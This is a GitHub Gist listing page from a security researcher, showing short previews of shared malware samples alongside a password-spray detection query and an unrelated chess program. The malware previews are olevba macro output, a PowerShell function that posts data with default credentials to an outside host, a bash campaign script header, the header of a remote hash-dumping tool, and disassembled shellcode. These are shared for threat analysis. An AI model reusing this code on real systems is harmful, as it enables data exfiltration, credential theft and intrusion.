John Lambert JohnLaTwC

@JohnLaTwC
JohnLaTwC / VbaProject.OTM
Created Nov 13, 2019
Malicious OTM file 7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4 related to a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
View VbaProject.OTM
## uploaded by @JohnLaTwC
## thx @MalwareRE
## see https://www.virustotal.com/gui/file/7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4/detection
olevba 0.54.2 on Python 3.7.2 - http://decalage.info/python/oletools
===============================================================================
7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4\7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisOutlookSession.cls
View a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740.bas
olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
View 26f5d965bd75023f0582303e76b513da87eca4f62279d6c7b7f8f7f37b97391f
## uploaded by @JohnLaTwC
## Sample hash: 26f5d965bd75023f0582303e76b513da87eca4f62279d6c7b7f8f7f37b97391f
import subprocess
import re
import binascii
import socket
import struct
import threading
View 834fffd10bde94c6020d3ee72cc94140b29bb7ac4cd9afdb2d68278da74f5bb2
function sxuveww( $zgzbjie ){
$jcavxhj = New-Object System.Net.WebClient;
$jcavxhj.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$jcavxhj.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$jcavxhj.Encoding = [System.Text.Encoding]::UTF8;
try{
$seezzhbd = $jcavxhj.UploadString( "http://surv.surviveandthriveparenting.com/", "guid=temp_2163694146&" + $zgzbjie );
return $seezzhbd;
}catch{};
return $false;
@JohnLaTwC
JohnLaTwC / attack.csl
Created May 7, 2019
Azure Sentinel Password spray query
View attack.csl
let valid_logons = (OfficeActivity
| where TimeGenerated > ago(30d)
| where Operation == 'UserLoggedIn'
| summarize by ClientIP);
let only_invalid_logons = (OfficeActivity
| where TimeGenerated > ago(30d)
| where Operation == 'UserLoginFailed'
| summarize by ClientIP)
| join kind=anti (valid_logons) on ClientIP;
OfficeActivity
@JohnLaTwC
JohnLaTwC / bashscript.sh
Created May 6, 2019
Bash script: 077d51016727216dd6216a3722353be274288d411a6295a5d804d251dacd88fc
View bashscript.sh
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#This is the Old-ReBuild Lady job copy
#
#Goal:
# The goal of this campaign is as follows;
# - To keep the internet safe.
# - To keep them hackers from causing real damage to organisations.
# - We know you feel We are a potential threat, well We ain't.
View 7d82ef55ea5f59a09c42d4c423a6e0ea33731c7e0d1f59509df390656377fea2
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description: Performs various techniques to dump hashes from the
# remote machine without executing any agent there.
# For SAM and LSA Secrets (including cached creds)
# we try to read as much as we can from the registry
View asm
00000000 FC CLD
00000001 E882000000 CALL -FFFFFF78
00000006 60 PUSHA
00000007 89E5 MOV EBP,ESP
00000009 31C0 XOR EAX,EAX
0000000B 648B5030 MOV EDX,DWORD PTR FS:[EAX+30]
0000000F 8B520C MOV EDX,DWORD PTR [EDX+0C]
00000012 8B5214 MOV EDX,DWORD PTR [EDX+14]
00000015 8B7228 MOV ESI,DWORD PTR [EDX+28]
00000018 0FB74A26 MOVZX ECX,WORD PTR [EDX+26]
View Green shellcode winning entry
View winning chess alg
public class GregAlg : ChessAlg
{
public GregAlg()
{
}
private string LowECode(Piece p)
{
string s = "";